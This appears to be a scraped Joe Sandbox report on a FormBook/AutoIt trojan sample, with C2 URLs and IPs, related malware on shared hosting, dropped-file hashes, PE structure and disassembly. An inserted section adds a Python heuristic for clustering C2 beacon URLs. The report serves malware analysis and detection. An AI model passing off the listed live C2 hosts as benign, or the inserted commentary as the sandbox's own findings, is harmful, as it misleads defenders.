http://www.costmoon.com/9m56/?Stux7=wSNNrhltoDErcnEw+GwIxBUk+E+vX1/TDY+0HSDY/xjQqFM+lgiwoO4LpiVzuA8Bz+prc1fM5Kq2+VzXMkRPNkNvcw4gdSknrLieRXJ4XwgsEWF+LJyDECQspbYqq9pNrRLiTEI=&YF9Df=_VBD7fO8YfupmT | true | Avira URL Cloud: safe | unknown
http://www.6171nvuhb.rent/hqcp/?Stux7=a7ZQHf8WLvhHVBver5nOwZih6r/S4XIGgVvybuFCKLHzqS2zk6yuhV2s1hLkbw5zmPfcdtbcw9raqNmLcm/5Ggyq9qBeDFk3p2MLA1pm9c8F5HyDpkyVADePZbSIOvXG2KyhUgY=&YF9Df=_VBD7fO8YfupmT | true | Avira URL Cloud: safe | unknown
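The four URLs flagged malicious above share one shape: a single four-character path component, and, where a query is present, exactly two parameters with five-character names whose second value (_VBD7fO8YfupmT) is identical across two different hosts. Both URL reputation services rate them "safe", so a proxy-log heuristic keyed on that shape is more useful here than reputation. The following is an added example, not code from the report: it classifies the URLs copied from this page's tables and clusters beacon-like URLs that share a trailing parameter value. That the shape generalises beyond the URLs on this page is an assumption of the example, not a FormBook specification; the function names are the example's own.

```python
"""Shape heuristic for the C2 URLs listed on this page (added example, not report code)."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

PATH_RE = re.compile(r"^/[a-z0-9]{4}/$", re.I)       # one four-character directory
KEY_RE = re.compile(r"^[A-Za-z0-9]{5}$")             # five-character parameter names
VALUE_RE = re.compile(r"^[A-Za-z0-9+/=_-]{8,}$")     # base64-like values, '+' and '/' kept


def split_query(query):
    """Split a query string without percent-decoding, so '+' inside a value survives
    (urllib.parse.parse_qsl would turn it into a space and break the value check)."""
    pairs = []
    for part in query.split("&"):
        key, _, value = part.partition("=")
        pairs.append((key, value))
    return pairs


def is_beacon_like(url):
    """True when a URL matches the shape of this page's flagged URLs (assumption: the
    shape, not a protocol specification)."""
    u = urlsplit(url)
    if u.scheme != "http" or not PATH_RE.match(u.path):
        return False
    if not u.query:
        return True            # bare directory, as in http://www.motorsportgives.com/9qp3/
    pairs = split_query(u.query)
    return len(pairs) == 2 and all(KEY_RE.match(k) and VALUE_RE.match(v) for k, v in pairs)


def cluster_by_trailing_param(urls):
    """Group beacon-like URLs by the value of their last query parameter; the same value
    on different hosts ties them to one configuration's C2 list."""
    hosts = defaultdict(set)
    for url in urls:
        u = urlsplit(url)
        if is_beacon_like(url) and u.query:
            _, value = split_query(u.query)[-1]
            hosts[value].add(u.hostname)
    return {value: sorted(h) for value, h in hosts.items() if len(h) > 1}


# Copied from this page's URL tables; the last three are benign rows from the same tables.
PAGE_URLS = [
    "http://www.costmoon.com/9m56/?Stux7=wSNNrhltoDErcnEw+GwIxBUk+E+vX1/TDY+0HSDY/xjQqFM+lgiwoO4LpiVzuA8Bz+prc1fM5Kq2+VzXMkRPNkNvcw4gdSknrLieRXJ4XwgsEWF+LJyDECQspbYqq9pNrRLiTEI=&YF9Df=_VBD7fO8YfupmT",
    "http://www.6171nvuhb.rent/hqcp/?Stux7=a7ZQHf8WLvhHVBver5nOwZih6r/S4XIGgVvybuFCKLHzqS2zk6yuhV2s1hLkbw5zmPfcdtbcw9raqNmLcm/5Ggyq9qBeDFk3p2MLA1pm9c8F5HyDpkyVADePZbSIOvXG2KyhUgY=&YF9Df=_VBD7fO8YfupmT",
    "http://www.motorsportgives.com/9qp3/",
    "http://www.motorsportgives.com",
    "https://duckduckgo.com/ac/?q=",
    "https://www.google.com/images/branding/product/ico/googleg_lodp.ico",
]

if __name__ == "__main__":
    for url in PAGE_URLS:
        print(is_beacon_like(url), url[:60])
    print(cluster_by_trailing_param(PAGE_URLS))
```

The clustering step is the part worth keeping in an investigation: when the same trailing value turns up on hosts that reputation services rate as safe, the hosts belong to the same sample's rotation and can be blocked together rather than one at a time.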
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/chrome_newtab | RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://hm.baidu.com/hm.js?7758179a36947d1ed305205311f9e27d | RpcPing.exe, 00000009.00000002.3340567073.0000000004056000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3341923085.0000000006240000.00000004.00000800.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000003326000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://hm.baidu.com/hm.js?be472e8744edb3816324a1183cdffac6 | RpcPing.exe, 00000009.00000002.3340567073.0000000004056000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3341923085.0000000006240000.00000004.00000800.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000003326000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.motorsportgives.com | DUipWAeQLm.exe, 0000000A.00000002.3339015758.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://hm.baidu.com/hm.js?800ccf274c3a593a3653e6acbfb00c7c | RpcPing.exe, 00000009.00000002.3340567073.0000000004056000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3341923085.0000000006240000.00000004.00000800.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000003326000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aaa.za1.bztqk.cn/123.html | RpcPing.exe, 00000009.00000002.3340567073.0000000004056000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3341923085.0000000006240000.00000004.00000800.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000003326000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
74.208.236.38 | www.costmoon.com | United States | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
74.208.236.230 | www.motorsportgives.com | United States | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
142.202.6.230 | www.6171nvuhb.rent | Reserved | 62838 | REPRISE-HOSTINGUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1466067
Start date and time: 2024-07-02 13:51:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 47s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@3/3
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 56
• Number of non-executed functions: 270
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• VT rate limit hit for: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe
Time | Type | Description
07:53:48 | API Interceptor | 15x Sleep call for process: RpcPing.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
74.208.236.230 | Financial Results April 21.pptx (9,753K).exe | malicious | FormBook | www.bobacravings.com/tboh/?yrvHSPgX=MBqeKa5Q5XoIMPVQAhoeLQTRyEQKEekeopNHcmeA1CZ1keeV9aqQjzSCc2CMYppNA8qs&K8e4v=Ab8TRh10Irv0MPg
74.208.236.230 | PO_210308.exe | malicious | FormBook | www.theordinaryph.com/ntg/?9r=2dRdKtpX&uZCD=VPw6ieQm3u5hP3AVpthyzZxVSOwwRWALHmifNOQ+HiAyoOEWEcRl85tQofppZZZ+04fP
                  No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
REPRISE-HOSTINGUS | 5NiE12PYJz.elf | malicious | Mirai | 185.179.207.166
REPRISE-HOSTINGUS | DleeCmz8nw.elf | malicious | Mirai | 185.179.207.142
REPRISE-HOSTINGUS | x86.elf | malicious | Mirai | 185.179.207.112
REPRISE-HOSTINGUS | mips.elf | malicious | Unknown | 185.179.207.156
REPRISE-HOSTINGUS | sora.mpsl.elf | malicious | Mirai | 185.179.207.128
REPRISE-HOSTINGUS | QbQ0spd3GB.elf | malicious | Mirai | 185.179.207.143
REPRISE-HOSTINGUS | 43ZYohKtbk.elf | malicious | Mirai | 185.179.207.136
REPRISE-HOSTINGUS | qrUvlKkf7N.elf | malicious | Mirai | 185.179.207.110
REPRISE-HOSTINGUS | arm5-20230705-0410.elf | malicious | Moobot | 142.202.6.159
REPRISE-HOSTINGUS | uwVvr9YXPn.elf | malicious | Mirai | 142.202.6.152
ONEANDONE-ASBrauerstrasse48DE | Attendance list.exe | malicious | FormBook | 217.160.0.106
ONEANDONE-ASBrauerstrasse48DE | 8hd98EhtIFcYkb8.exe | malicious | FormBook | 74.208.236.162
ONEANDONE-ASBrauerstrasse48DE | rPRESUPUESTO.exe | malicious | FormBook | 74.208.236.72
ONEANDONE-ASBrauerstrasse48DE | yaM8XR1HfL.exe | malicious | DarkTortilla, FormBook | 217.160.0.1
ONEANDONE-ASBrauerstrasse48DE | https://www.asarco.com/ | malicious | Unknown | 74.208.236.164
ONEANDONE-ASBrauerstrasse48DE | Att0027592.exe | malicious | FormBook | 217.76.156.252
ONEANDONE-ASBrauerstrasse48DE | AWB 112-17259653.exe | malicious | FormBook | 217.160.0.144
ONEANDONE-ASBrauerstrasse48DE | scan19062024.exe | malicious | FormBook | 212.227.172.254
ONEANDONE-ASBrauerstrasse48DE | SecuriteInfo.com.Win32.Malware-gen.371.3693.exe | malicious | Unknown | 217.160.0.130
ONEANDONE-ASBrauerstrasse48DE | SecuriteInfo.com.Win32.Malware-gen.371.3693.exe | malicious | Unknown | 217.160.0.130
                  No context
                  No context
                  Process:C:\Windows\SysWOW64\RpcPing.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                  Category:dropped
                  Size (bytes):196608
                  Entropy (8bit):1.1239949490932863
                  Encrypted:false
                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                  MD5:271D5F995996735B01672CF227C81C17
                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe
                  File Type:ASCII text, with very long lines (28756), with no line terminators
                  Category:dropped
                  Size (bytes):28756
                  Entropy (8bit):3.591385962456068
                  Encrypted:false
                  SSDEEP:768:miTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbp+IC6bd4vfF3if6gyud:miTZ+2QoioGRk6ZklputwjpjBkCiw2RR
                  MD5:0B24AF83EE786ECAF547FB81C80D6956
                  SHA1:5FAC82A415B09ED670020AA2377B6BCB5F3A6FFE
                  SHA-256:26E5B9A3CDE6F21B8BA6D01F2C979C93DE6D631E55AA4326C5469ABBCD2FC5A8
                  SHA-512:031BCFE8D0BD64B002CAD9ECF1F3536E7D4E525CDE85B52AEFECFE8D85B4E9B0366F1310D87915CC3F0BDDA4E1855BB6DC1CFEDD629BF102C21055A514CB5CFD
                  Malicious:false
                  Reputation:low
                  Preview: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
                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):286208
                  Entropy (8bit):7.994375681954108
                  Encrypted:true
                  SSDEEP:6144:GA2wkwM+yGld/SPTJfn/TIHku0lyy7CDHgRaW88mr/4NgjCd:GA2K5y6dWn/TIHR2yy75aWZ9d
                  MD5:BCE6497EDCADD36058C985629D5C11A2
                  SHA1:FE5B7801680FBCA9697C46E5280B14F63BF5BAD3
                  SHA-256:295B6024FB753B1D72752099299D577436FB14AA208729186617B577AABB13EF
                  SHA-512:0D79D577BCB0433C26F271CC7AE93F017B1704C7FFF0C25C4C83B58500DB0F2510DDC702E29C2938096C8A675D969264477ED2E0A9F0D6DE3F6AC57DFACD9416
                  Malicious:false
                  Reputation:low
                  Preview:u.}..E08X.._...z.I;...`F8..MXV7ADOFLI8R8SHE08XIMXV7ADOFLI.R8SFZ.6X.D.w.@..g.!Q!.#:*WJ9$m;7Y/+;f.,. M=h,^....x;X%!aKAC.R8SHE08!HD.kW&.r&+..2_.R..b)*.L..s&+."...t%W.. .0kW&.OFLI8R8S..08.HLXdMA.OFLI8R8S.E29SHFXV{EDOFLI8R8S.P08XYMXVWEDOF.I8B8SHG08^IMXV7ADIFLI8R8SH%48XKMXV7ADMF..8R(SHU08XI]XV'ADOFLI(R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXxC$<;FLIL.<SHU08X.IXV'ADOFLI8R8SHE08xIM8V7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI
                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):9856
                  Entropy (8bit):7.5984942475612405
                  Encrypted:false
                  SSDEEP:192:65jwEiqxwzMZTG3c6Vg0X9O1JZUv3QfyYxvo3pFq7S4DxJOy+28x9BkUc2:I6qxwzMZy3QU9Obysvo5eS4DxJOy+lkI
                  MD5:71E5CC180BE1E5265605F07EE74DA1B8
                  SHA1:2F8B2485D4AA2F77A7E76295780F1DA702FC9189
                  SHA-256:A5392C360A8C1C7D1AEA6E50DBA426C619DAC8A7E1503A1BF7582E2113C0B49C
                  SHA-512:5D834CDB0A11BCD81BA1687132C0DAC995FDAFF463BF5D3A398052169ADBD2F2C3FC41645D2936CF3C254B5B52A28F324EA10B52050F58704176FCAC97CCBBA6
                  Malicious:false
                  Reputation:low
                  Preview:EA06..pT.Q&...8.M.z,.D.Lf....y9......o3.N&T...5...j..m1..f.Y..cD.L'.....3.N(s...m9...s.5..8.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,@. ...3+..d....s4.l&..........|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.|f #^...j......l.....l.5....>0..Xf....M.^....$zn.....G..I....C...M.|........}S{....7...| l..P..........0...`>;..c7.6..{......=..7..............6,......b...,S ...i5.M.4.b..i|v)....b.h.,@..%........9....c...|3Y..h......._......@.>K...,v[..q5.M,.@..i7.X......9....2.......,.`....3.,.i8........}.k(.f..@..M&V....7.,.x....&.......0.......Fh...Fb.....3.."a9...`....,vb.....cd.X..P.Fl.Y.$..c. ....I...d..f.!...,vd......8..P.......0.....2...y...D.......c.0.......b.<NA...NM..;4.X.q1..&@Q..B.Y.ah......Yl.i..."..Bvj.........ic..'3Y..'f.....,j.1........C.`....7b.., .p..T.......Y,Vi......@
                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):286208
                  Entropy (8bit):7.994375681954108
                  Encrypted:true
                  SSDEEP:6144:GA2wkwM+yGld/SPTJfn/TIHku0lyy7CDHgRaW88mr/4NgjCd:GA2K5y6dWn/TIHR2yy75aWZ9d
                  MD5:BCE6497EDCADD36058C985629D5C11A2
                  SHA1:FE5B7801680FBCA9697C46E5280B14F63BF5BAD3
                  SHA-256:295B6024FB753B1D72752099299D577436FB14AA208729186617B577AABB13EF
                  SHA-512:0D79D577BCB0433C26F271CC7AE93F017B1704C7FFF0C25C4C83B58500DB0F2510DDC702E29C2938096C8A675D969264477ED2E0A9F0D6DE3F6AC57DFACD9416
                  Malicious:false
                  Reputation:low
                  Preview:u.}..E08X.._...z.I;...`F8..MXV7ADOFLI8R8SHE08XIMXV7ADOFLI.R8SFZ.6X.D.w.@..g.!Q!.#:*WJ9$m;7Y/+;f.,. M=h,^....x;X%!aKAC.R8SHE08!HD.kW&.r&+..2_.R..b)*.L..s&+."...t%W.. .0kW&.OFLI8R8S..08.HLXdMA.OFLI8R8S.E29SHFXV{EDOFLI8R8S.P08XYMXVWEDOF.I8B8SHG08^IMXV7ADIFLI8R8SH%48XKMXV7ADMF..8R(SHU08XI]XV'ADOFLI(R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXxC$<;FLIL.<SHU08X.IXV'ADOFLI8R8SHE08xIM8V7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI8R8SHE08XIMXV7ADOFLI
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.1628969378768605
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe
                  File size:1'208'832 bytes
                  MD5:a6d5020bf8bfe2dc1140a50936ef5ec9
                  SHA1:284d6d281a186da8c7bfa0ee5ce310be41be800b
                  SHA256:ac162f990dd540c5b295e5c8dfccc04374519feaa70ed0439292f70761a034cd
                  SHA512:830b92f223da57ae997219e5ba8d4719dfe729639686facbd398c883567652e96a8636141e9da169228360c218107aed80f1eff23bf52f418765951f8cfa0e2b
                  SSDEEP:24576:PAHnh+eWsN3skA4RV1Hom2KXMmHaPR5sVmkNr9QkGTBuIEsY5:yh+ZkldoPK8YaPHsZvQpjET
                  TLSH:E545BE0273D2C032FFAB92739B6AF60156BD79254123852F13981DB9BD701B2267E763
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                  Icon Hash:aaf3e3e3938382a0
                  Entrypoint:0x42800a
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x6683C083 [Tue Jul 2 08:55:31 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:afcdf79be1557326c854b6e20cb900a7
                  Instruction
                  call 00007F68587FA17Dh
                  jmp 00007F68587ECF34h
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  push edi
                  push esi
                  mov esi, dword ptr [esp+10h]
                  mov ecx, dword ptr [esp+14h]
                  mov edi, dword ptr [esp+0Ch]
                  mov eax, ecx
                  mov edx, ecx
                  add eax, esi
                  cmp edi, esi
                  jbe 00007F68587ED0BAh
                  cmp edi, eax
                  jc 00007F68587ED41Eh
                  bt dword ptr [004C41FCh], 01h
                  jnc 00007F68587ED0B9h
                  rep movsb
                  jmp 00007F68587ED3CCh
                  cmp ecx, 00000080h
                  jc 00007F68587ED284h
                  mov eax, edi
                  xor eax, esi
                  test eax, 0000000Fh
                  jne 00007F68587ED0C0h
                  bt dword ptr [004BF324h], 01h
                  jc 00007F68587ED590h
                  bt dword ptr [004C41FCh], 00000000h
                  jnc 00007F68587ED25Dh
                  test edi, 00000003h
                  jne 00007F68587ED26Eh
                  test esi, 00000003h
                  jne 00007F68587ED24Dh
                  bt edi, 02h
                  jnc 00007F68587ED0BFh
                  mov eax, dword ptr [esi]
                  sub ecx, 04h
                  lea esi, dword ptr [esi+04h]
                  mov dword ptr [edi], eax
                  lea edi, dword ptr [edi+04h]
                  bt edi, 03h
                  jnc 00007F68587ED0C3h
                  movq xmm1, qword ptr [esi]
                  sub ecx, 08h
                  lea esi, dword ptr [esi+08h]
                  movq qword ptr [edi], xmm1
                  lea edi, dword ptr [edi+08h]
                  test esi, 00000007h
                  je 00007F68587ED115h
                  bt esi, 03h
                  Programming Language:
                  • [ASM] VS2013 build 21005
                  • [ C ] VS2013 build 21005
                  • [C++] VS2013 build 21005
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [ASM] VS2013 UPD5 build 40629
                  • [RES] VS2013 build 21005
                  • [LNK] VS2013 UPD5 build 40629
                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc0cc | 0x17c | .rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x5cafc | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x125000 | 0x7134 | .reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4b50 | 0x40 | .rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x1000 | 0x8dfdd | 0x8e000 | 310e36668512d53489c005622bb1b4a9 | False | 0.5735602580325704 | data | 6.675248351711057 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata | 0x8f000 | 0x2fd8e | 0x2fe00 | 748cf1ab2605ce1fd72d53d912abb68f | False | 0.32828818537859006 | data | 5.763244005758284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data | 0xbf000 | 0x8f74 | 0x5200 | aae9601d920f07080bdfadf43dfeff12 | False | 0.1017530487804878 | data | 1.1963819235530628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc | 0xc8000 | 0x5cafc | 0x5cc00 | b6e9031fdf82786b232a3e43e19b45ea | False | 0.9290899806266847 | data | 7.896807472814627 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc | 0x125000 | 0x7134 | 0x7200 | f04128ad0f87f42830e4a6cdbc38c719 | False | 0.7617530153508771 | data | 6.783955557128661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                  RT_ICON | 0xc85a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                  RT_ICON | 0xc86d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                  RT_ICON | 0xc87f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                  RT_ICON | 0xc8920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
                  RT_ICON | 0xc8c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
                  RT_ICON | 0xc8d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
                  RT_ICON | 0xc9bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
